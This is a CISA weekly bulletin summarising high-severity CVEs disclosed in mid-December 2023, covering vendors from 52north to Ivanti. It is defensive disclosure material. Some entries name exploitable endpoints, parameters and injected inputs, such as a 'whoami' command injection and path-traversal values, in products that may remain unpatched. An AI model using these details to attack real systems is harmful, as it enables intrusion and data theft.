US-CERT Vulnerability Summary for the Week of December 18, 2023

Bulletins provide weekly summaries of new vulnerabilities. Patch information is provided when available.

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. NVD is sponsored by CISA. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities corresponds to the following scores:

  • High: vulnerabilities with a CVSS base score of 7.0–10.0
  • Medium: vulnerabilities with a CVSS base score of 4.0–6.9
  • Low: vulnerabilities with a CVSS base score of 0.0–3.9

Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis. 

High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
52north — 52north_wps | An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network. | 2023-12-19 | 7.2 | CVE-2023-6280
aditaas — allied_digital_integrated_tool-as-a-service | The vulnerability exists in ADiTaaS (Allied Digital Integrated Tool-as-a-Service) version 5.1 due to an improper authentication vulnerability in the ADiTaaS backend API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable platform. Successful exploitation of this vulnerability could allow the attacker to gain full access to the customers’ data and completely compromise the targeted platform. | 2023-12-18 | 9.8 | CVE-2023-6483
apache — doris | The API endpoints /api/snapshot and /api/get_log_file allow unauthenticated access. This could allow a DoS attack or retrieval of arbitrary files from the FE node. Please upgrade to 2.0.3 to fix these issues. | 2023-12-18 | 8.2 | CVE-2023-41314
apache — dubbo | A deserialization vulnerability existed when decoding a malicious package. This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue. | 2023-12-15 | 9.8 | CVE-2023-29234
apache — dubbo | Deserialization of Untrusted Data vulnerability in Apache Dubbo. This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue. | 2023-12-15 | 9.8 | CVE-2023-46279
apache — guacamole | Apache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.5.4, which fixes this issue. | 2023-12-19 | 8.8 | CVE-2023-43826
apache — guacamole | When installing the Net2 software a root certificate is installed into the trusted store. A potential hacker could access the installer batch file or reverse engineer the source code to gain access to the root certificate password. Using the root certificate and password they could then create their own certificates to emulate another site. Then by establishing a proxy service to emulate the site they could monitor traffic passed between the end user and the site allowing access to the data content. | 2023-12-19 | 8.1 | CVE-2023-43870
apache — pulsar | Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions. | 2023-12-20 | 7.5 | CVE-2023-37544
apache — superset | An authenticated Gamma user has the ability to create a dashboard and add charts to it; this user would automatically become one of the owners of the charts, allowing him to incorrectly have write permissions to these charts. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue. | 2023-12-19 | 7.7 | CVE-2023-49734
armorxgt — spamtrap | ArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete the database. | 2023-12-15 | 9.8 | CVE-2023-48384
aveva — edge | An issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed. | 2023-12-16 | 9.8 | CVE-2021-42796
aveva — edge | Path traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources. | 2023-12-16 | 7.5 | CVE-2021-42797
awslabs — sandbox-accounts-for-events | “Sandbox Accounts for Events” provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially claim and access empty AWS accounts by sending request payloads to the account API containing non-existent event ids and self-defined budget & duration. This issue only affects cleaned AWS accounts; it is not possible to access AWS accounts in use or existing data/infrastructure. This issue has been patched in version 1.1.0. | 2023-12-22 | 7.1 | CVE-2023-50928
awslabs — sandbox-accounts-for-events | Sandbox Accounts for Events provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially read data from the events table by sending request payloads to the events API, collecting information on planned events, timeframes, budgets and owner email addresses. This data access may allow users to get insights into upcoming events and join events which they have not been invited to. This issue has been patched in version 1.10.0. | 2023-12-22 | 7.8 | CVE-2023-51386
backupbliss — backup_migration | The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server. | 2023-12-15 | 9.8 | CVE-2023-6553
bazarr — bazarr | Bazarr manages and downloads subtitles. Prior to 1.3.1, the /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. | 2023-12-15 | 7.5 | CVE-2023-50264
bazarr — bazarr | Bazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. | 2023-12-15 | 7.5 | CVE-2023-50265
bosch — cpp13_firmware | A command injection vulnerability exists in Bosch IP cameras that allows an authenticated user with administrative rights to run arbitrary commands on the OS of the camera. | 2023-12-18 | 7.2 | CVE-2023-39509
bosch — monitor_wall | An improper handling of a malformed API request to an API server in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. | 2023-12-18 | 7.5 | CVE-2023-32230
cacti — cacti | Cacti is a robust performance and fault management framework and a frontend to RRDTool – a Time Series Database (TSDB). While using the detected SQL Injection and insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `link.php`. Impact of the vulnerability: execution of arbitrary code on the server. | 2023-12-21 | 8 | CVE-2023-49084
cacti — cacti | Cacti provides an operational monitoring and fault management framework. In versions 1.2.25 and prior, it is possible to execute arbitrary SQL code through the `pollers.php` script. An authorized user may be able to execute arbitrary SQL code. The vulnerable component is the `pollers.php`. Impact of the vulnerability – arbitrary SQL code execution. As of time of publication, a patch does not appear to exist. | 2023-12-22 | 8.8 | CVE-2023-49085
cacti — cacti | Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `managers.php`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `/cacti/managers.php` with an SQLi payload in the `selected_graphs_array` HTTP GET parameter. As of time of publication, no patched versions exist. | 2023-12-22 | 8.8 | CVE-2023-51448
cambium_ — epmp_force_300-25 | Cambium ePMP Force 300-25 version 4.7.0.1 is vulnerable to a code injection vulnerability that could allow an attacker to perform remote code execution and gain root privileges. | 2023-12-18 | 7.8 | CVE-2023-6691
clickhouse — clickhouse | ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of T64 codec that crashes the ClickHouse server process. This attack does not require authentication. Note that this exploit can also be triggered via HTTP protocol, however, the attacker will need a valid credential as the HTTP authentication takes place first. This issue has been fixed in version 23.10.2.13-stable, 23.9.4.11-stable, 23.8.6.16-lts and 23.3.16.7-lts. | 2023-12-20 | 7 | CVE-2023-47118
clickhouse — clickhouse | ClickHouse is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of Gorilla codec that crashes the ClickHouse server process. This attack does not require authentication. This issue has been addressed in ClickHouse Cloud version 23.9.2.47551 and ClickHouse versions 23.10.5.20, 23.3.18.15, 23.8.8.20, and 23.9.6.20. | 2023-12-22 | 7 | CVE-2023-48704
codelyfe — stupid_simple_cms | A vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259. | 2023-12-17 | 9.8 | CVE-2023-6901
codelyfe — stupid_simple_cms | A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260. | 2023-12-17 | 9.8 | CVE-2023-6902
codelyfe — stupid_simple_cms | A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability. | 2023-12-18 | 9.1 | CVE-2023-6907
csharp — cws_collaborative_development_platform | SmartStar Software CWS is a web-based integration platform. Its file uploading function does not restrict upload of files with dangerous types. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service. | 2023-12-15 | 9.8 | CVE-2023-48376
csharp — cws_collaborative_development_platform | SmartStar Software CWS is a web-based integration platform. It has a vulnerability of missing authorization, and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated user with normal user privilege can execute administrator privilege, resulting in performing arbitrary system operations or disrupting service. | 2023-12-15 | 8.8 | CVE-2023-48375
cybrosys — website_blog_search | A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component. | 2023-12-15 | 9.8 | CVE-2023-48049
dell — cpg_bios | Dell Client BIOS contains a pre-boot direct memory access (DMA) vulnerability. An authenticated attacker with physical access to the system may potentially exploit this vulnerability in order to execute arbitrary code on the device. | 2023-12-22 | 7.2 | CVE-2023-43088
dell — supportassist_client_consumer | Dell SupportAssist for Home PCs version 3.14.1 and prior versions contain a privilege escalation vulnerability in the installer. A local low privileged authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges. | 2023-12-22 | 7.3 | CVE-2023-48670
dlink — dir-850l_firmware | An issue in D-Link DIR-850L v.B1_FW223WWb01 allows a remote attacker to execute arbitrary code via a crafted script to the en parameter. | 2023-12-19 | 9.8 | CVE-2023-49004
dromara_hertzbeat — dromara_hertzbeat | Hertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions in versions prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on hertzbeat server. A malicious user who has access to alert define function can execute any command in hertzbeat instance. This issue is fixed in version 1.4.1. | 2023-12-22 | 7.2 | CVE-2023-51387
dromara_hertzbeat — dromara_hertzbeat | Hertzbeat is an open source, real-time monitoring system. Prior to version 1.4.1, Spring Boot permission configuration issues caused unauthorized access vulnerabilities to three interfaces. This could result in disclosure of sensitive server information. Version 1.4.1 fixes this issue. | 2023-12-22 | 7.5 | CVE-2023-51650
dromara_hertzbeat — dromara_hertzbeat | Hertzbeat is an open source, real-time monitoring system with custom-monitoring, high performance cluster, prometheus-like and agentless. Hertzbeat versions 1.20 and prior have a permission bypass vulnerability. System authentication can be bypassed and invoke interfaces without authorization. Version 1.2.1 contains a patch for this issue. | 2023-12-22 | 7.5 | CVE-2022-39337
efacec — bcu_500 | Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device. | 2023-12-20 | 9.6 | CVE-2023-50707
efacec — bcu_500 | A successful CSRF attack could force the user to perform state changing requests on the application. If the victim is an administrative account, a CSRF attack could compromise the entire web application. | 2023-12-20 | 8.2 | CVE-2023-6689
engelsystem — engelsystem | Engelsystem is a shift planning system for chaos events. Engelsystem prior to v3.4.1 performed insufficient validation of user supplied data for the DECT number, mobile number, and work-log comment fields. The values of those fields would be displayed in corresponding log overviews, allowing the injection and execution of Javascript code in another user’s context. This vulnerability enables an authenticated user to inject Javascript into other users’ sessions. The injected JS will be executed during normal usage of the system when viewing, e.g., overview pages. This issue has been fixed in version 3.4.1. | 2023-12-22 | 7.3 | CVE-2023-50924
eset,_spol._s_r.o. — eset_nod32_antivirus | Improper validation of the server’s certificate chain in secure traffic scanning feature considered intermediate certificate signed using the MD5 or SHA1 algorithm as trusted. | 2023-12-21 | 7.5 | CVE-2023-5594
eurotel — etl3100 | EuroTel ETL3100 versions v01c01 and v01x37 do not limit the number of attempts to guess administrative credentials in remote password attacks to gain full control of the system. | 2023-12-19 | 9.8 | CVE-2023-6928
eurotel — etl3100 | EuroTel ETL3100 versions v01c01 and v01x37 suffer from an unauthenticated configuration and log download vulnerability. This enables the attacker to disclose sensitive information and assist in authentication bypass, privilege escalation, and full system access. | 2023-12-19 | 9.4 | CVE-2023-6930
eurotel — etl3100 | EuroTel ETL3100 versions v01c01 and v01x37 are vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization, access the hidden resources on the system, and execute privileged functionalities. | 2023-12-19 | 7.5 | CVE-2023-6929
forestblog — forestblog | A vulnerability classified as critical has been found in saysky ForestBlog up to 20220630. This affects an unknown part of the file /admin/upload/img of the component Image Upload Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248247. | 2023-12-17 | 9.8 | CVE-2023-6887
gallagher — controller_6000 | A format string issue in the Controller 6000’s optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service. This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior. | 2023-12-18 | 7.5 | CVE-2023-24590
getsentry — sentry-javascript | Sentry-Javascript is official Sentry SDKs for JavaScript. A ReDoS (Regular expression Denial of Service) vulnerability has been identified in Sentry’s Astro SDK 7.78.0-7.86.0. Under certain conditions, this vulnerability allows an attacker to cause excessive computation times on the server, leading to denial of service (DoS). This vulnerability has been patched in sentry/astro version 7.87.0. | 2023-12-20 | 7.5 | CVE-2023-50249
github — enterprise_server | Improper privilege management in all versions of GitHub Enterprise Server allows users with authorized access to the management console with an editor role to escalate their privileges by making requests to the endpoint used for bootstrapping the instance. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.6, 3.10.3, and 3.11.0. | 2023-12-21 | 8 | CVE-2023-46647
github — enterprise_server | An insufficient entropy vulnerability was identified in GitHub Enterprise Server (GHES) that allowed an attacker to brute force a user invitation to the GHES Management Console. To exploit this vulnerability, an attacker would need knowledge that a user invitation was pending. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. | 2023-12-21 | 8.3 | CVE-2023-46648
github — enterprise_server | An insertion of sensitive information into log file vulnerability was identified in the log files for a GitHub Enterprise Server back-end service that could permit an `adversary in the middle attack` when combined with other phishing techniques. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 8.1 | CVE-2023-6746
github — enterprise_server | An insertion of sensitive information into the log file in the audit log in GitHub Enterprise Server was identified that could allow an attacker to gain access to the management console. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 7.2 | CVE-2023-6802
github — enterprise_server | An improper authentication vulnerability was identified in GitHub Enterprise Server that allowed a bypass of Private Mode by using a specially crafted API request. To exploit this vulnerability, an attacker would need network access to the Enterprise Server appliance configured in Private Mode. This vulnerability affected all versions of GitHub Enterprise Server since 3.9 and was fixed in version 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. | 2023-12-21 | 7.5 | CVE-2023-6847
gitlab — gitlab | A privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner. | 2023-12-17 | 8.8 | CVE-2023-3907
gitlab — gitlab | An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator. | 2023-12-15 | 8.1 | CVE-2023-6680
gitlab — gitlab | An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards. | 2023-12-15 | 7.5 | CVE-2023-3904
gmarczynski — dynamic_progress_bar | A SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component. | 2023-12-15 | 9.8 | CVE-2023-40954
grackle — grackle | Grackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn’t checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an application’s GraphQL schema would be required to construct such a query, however no knowledge of any application-specific performance or other behavioral characteristics would be needed. Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an application’s GraphQL schema would be required to construct such a query. The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing. | 2023-12-22 | 7.5 | CVE-2023-50730
hcl_software — hcl_bigfix_platform | Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. This XSS vulnerability is in the Download Status Report, which is served by the BigFix Server. | 2023-12-21 | 7.7 | CVE-2023-37519
hcl_software — hcl_bigfix_platform | Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability identified in BigFix Server version 9.5.12.68, allowing for potential data exfiltration. This XSS vulnerability is in the Gather Status Report, which is served by the BigFix Relay. | 2023-12-21 | 7.7 | CVE-2023-37520
hewlett_packard_enterprise — multiple_products | A potential security vulnerability has been identified in HPE Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 6 (iLO 6). The vulnerability could be remotely exploited to allow authentication bypass. | 2023-12-19 | 7.5 | CVE-2023-50272
hikvision — intercom_broadcast_system | A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:\ICPAS\Wnmp\WWW\php\conversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248252. | 2023-12-17 | 7.5 | CVE-2023-6893
hitachi_energy — rtu500_scripting_interface | A vulnerability exists in the component RTU500 Scripting interface. When a client connects to a server using TLS, the server presents a certificate. This certificate links a public key to the identity of the service and is signed by a Certification Authority (CA), allowing the client to validate that the remote service can be trusted and is not malicious. If the client does not validate the parameters of the certificate, then attackers could be able to spoof the identity of the service. An attacker could exploit the vulnerability by faking the identity of an RTU500 device and intercepting the messages initiated via the RTU500 Scripting interface. | 2023-12-19 | 7.4 | CVE-2023-1514
hp — system_management_homepage | A potential security vulnerability has been identified with HP-UX System Management Homepage (SMH). This vulnerability could be exploited locally or remotely to disclose information. | 2023-12-17 | 7.5 | CVE-2023-50271
ibm — mq_appliance | IBM MQ Appliance 9.3 LTS and 9.3 CD could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request to view arbitrary files on the system. IBM X-Force ID: 269536. | 2023-12-18 | 7.5 | CVE-2023-46177
ibm — planning_analytics | IBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567. | 2023-12-22 | 8 | CVE-2023-42017
ibm — security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing “dot dot” sequences (/../) to view or modify files on the system. IBM X-Force ID: 271196. | 2023-12-20 | 9.1 | CVE-2023-47702
ibm — security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to upload files of a dangerous file type. IBM X-Force ID: 271341. | 2023-12-20 | 8.8 | CVE-2023-47706
ibm — security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 contains plain text hard-coded credentials or other secrets in source code repository. IBM X-Force ID: 271220. | 2023-12-20 | 7.5 | CVE-2023-47704
idemia — sigma_lite_firmware | The Parameter Zone Read and Parameter Zone Write command handlers allow a stack buffer overflow. This could potentially lead to remote code execution on the targeted device. | 2023-12-15 | 9.8 | CVE-2023-33218 | a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware | The handler of the retrofit validation command doesn’t properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. | 2023-12-15 | 9.8 | CVE-2023-33219 | a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware | During the retrofit validation process, the firmware doesn’t properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. | 2023-12-15 | 9.8 | CVE-2023-33220 | a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware | When reading DesFire keys, the function that reads the card doesn’t properly check the boundaries when internally copying the data received. This allows a heap-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use the default DESFire key. | 2023-12-15 | 9.8 | CVE-2023-33221 | a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware | By abusing a design flaw in the firmware upgrade mechanism of the impacted terminal, it’s possible to cause a permanent denial of service for the terminal. The only way to recover the terminal is by sending it back to the manufacturer. | 2023-12-15 | 7.5 | CVE-2023-33217 | a87f365f-9d39-4848-9b3a-58c7cae69cab
imou — imou_life_app | A session hijacking vulnerability has been detected in the Imou Life application affecting version 6.7.0. This vulnerability could allow an attacker to hijack user accounts due to the QR code functionality not properly filtering codes when scanning a new device and directly running WebView without prompting or displaying it to the user. This vulnerability could trigger phishing attacks. | 2023-12-19 | 8.1 | CVE-2023-6913
infinispan — infinispan | A flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration. | 2023-12-18 | 7.2 | CVE-2023-5384
istanbul_soft_informatics_and_consultancy_limited_company — softomi_advanced_c2c_marketplace_software | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Advanced C2C Marketplace Software allows SQL Injection. This issue affects Softomi Advanced C2C Marketplace Software: before 12122023. | 2023-12-21 | 9.8 | CVE-2023-6145
itpison — omicard_edm | ITPison OMICARD EDM’s file uploading function does not restrict upload of files with dangerous types. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service. | 2023-12-15 | 9.8 | CVE-2023-48371
itpison — omicard_edm | ITPison OMICARD EDM’s SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete the database. | 2023-12-15 | 9.8 | CVE-2023-48372
itpison — omicard_edm | ITPison OMICARD EDM has a path traversal vulnerability within its parameter “FileName” in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. | 2023-12-15 | 7.5 | CVE-2023-48373
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-41727
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46216
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46217
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46220
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46221
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46222
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46223
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46224
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46225
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46257
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46258
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46259
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46260
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46261
ivanti — avalanche | An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remote code execution. | 2023-12-19 | 9.8 | CVE-2023-46263
ivanti — avalanche | An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remote code execution. | 2023-12-19 | 9.8 | CVE-2023-46264
ivanti — avalanche | An unauthenticated attacker could abuse an XXE vulnerability in the Smart Device Server to leak data or perform a Server-Side Request Forgery (SSRF). | 2023-12-19 | 9.8 | CVE-2023-46265
